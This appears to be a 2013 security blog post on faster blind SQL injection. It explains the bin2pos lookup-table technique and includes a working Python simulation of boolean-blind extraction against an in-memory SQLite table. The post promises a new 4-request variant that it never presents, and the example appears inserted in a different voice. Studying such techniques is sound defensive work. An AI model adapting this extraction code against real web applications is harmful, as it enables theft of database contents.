Showing posts with label Time based SQLi. Show all posts

Saturday, 12 October 2013

Even Faster Blind SQL injection methods

A method presented at DerbyCon and BlackHat extracts not the bits of the character itself but the bits of the character's position in a lookup table that holds a chosen set of ASCII values, so that each character costs fewer bit-oracle requests (more on this later). This post discusses the conceptual advantages and fundamental drawbacks of that bin2pos method and introduces a new variant I have developed that is more stable and needs at most 4 requests per character, at the cost of some configuration requirements on the target web server.
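To make the bin2pos idea concrete, here is an added example (my own simulation, not code from this post or from the DerbyCon/BlackHat talk) that runs a boolean-blind extraction against a SQLite table in memory. It compares the classic per-bit extraction of the character's code with extraction of the bits of its position in a 63-entry lookup table, where a position of 0 (SQLite's `instr()` result for "not found") triggers a fallback to the classic method for that character. The secret value, the table layout and the lookup string are all constructed assumptions; SQLite's `unicode()` and `instr()` stand in for MySQL's `ASCII()` and `LOCATE()`.

```python
import sqlite3

# Constructed sample: the value an attacker wants to pull out through a blind injection.
SECRET = "s3cr3t_Pa55!"

# Constructed lookup table (assumption: the attacker chooses it). 63 entries, so a
# 1-based instr() result fits in 6 bits and the value 0 is reserved for "not in table".
LOOKUP = "etaoinsrhldcumfpgwybvkxjqz0123456789_ETAOINSRHLDCUMFPGWYBVKXJQZ"
assert len(LOOKUP) == 63 and len(set(LOOKUP)) == 63


def make_oracle(secret):
    """Simulated vulnerable endpoint: the attacker controls the tail of the WHERE
    clause and only learns whether a row came back (boolean-blind)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (secret,))

    def oracle(injected_condition):
        sql = f"SELECT id FROM users WHERE id = 1 AND ({injected_condition})"
        return conn.execute(sql).fetchone() is not None

    return oracle


def find_length(oracle, max_len=255):
    """Binary search on length(password); returns (length, requests used)."""
    lo, hi, requests = 0, max_len, 0
    while lo < hi:
        mid = (lo + hi) // 2
        requests += 1
        if oracle(f"length(password) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo, requests


def read_bits(oracle, expr, nbits):
    """Extract the low nbits of an integer SQL expression, one request per bit."""
    value = 0
    for b in range(nbits - 1, -1, -1):
        if oracle(f"(({expr}) >> {b}) & 1 = 1"):
            value |= 1 << b
    return value, nbits


def bin2ascii(oracle, length):
    """Classic bit-by-bit extraction: 7 requests per character (ASCII < 128)."""
    out, requests = "", 0
    for i in range(1, length + 1):
        code, n = read_bits(oracle, f"unicode(substr(password, {i}, 1))", 7)
        out += chr(code)
        requests += n
    return out, requests


def bin2pos(oracle, length):
    """bin2pos-style extraction: 6 requests per character, reading the bits of the
    character's 1-based position in LOOKUP. A position of 0 means the character is
    not in the table, so that character falls back to the 7-bit method."""
    out, requests = "", 0
    for i in range(1, length + 1):
        pos, n = read_bits(oracle, f"instr('{LOOKUP}', substr(password, {i}, 1))", 6)
        requests += n
        if pos == 0:
            code, n = read_bits(oracle, f"unicode(substr(password, {i}, 1))", 7)
            out += chr(code)
            requests += n
        else:
            out += LOOKUP[pos - 1]
    return out, requests


if __name__ == "__main__":
    oracle = make_oracle(SECRET)
    length, n_len = find_length(oracle)
    for name, method in (("bin2ascii", bin2ascii), ("bin2pos", bin2pos)):
        value, n = method(oracle, length)
        print(f"{name}: {value!r} in {n_len + n} requests")
```

Two practical notes. First, the saving per character is the difference between the bit width of the character code and the bit width of the table size, so the table should be as small as the target charset allows; every character outside it costs the full fallback on top of the wasted position lookup. Second, on MySQL `LOCATE()` is case-insensitive under the default non-binary collations, so a table containing both cases must be compared as a binary string or the position lookup silently merges `P` and `p`; SQLite's `instr()` is byte-wise and does not have this problem.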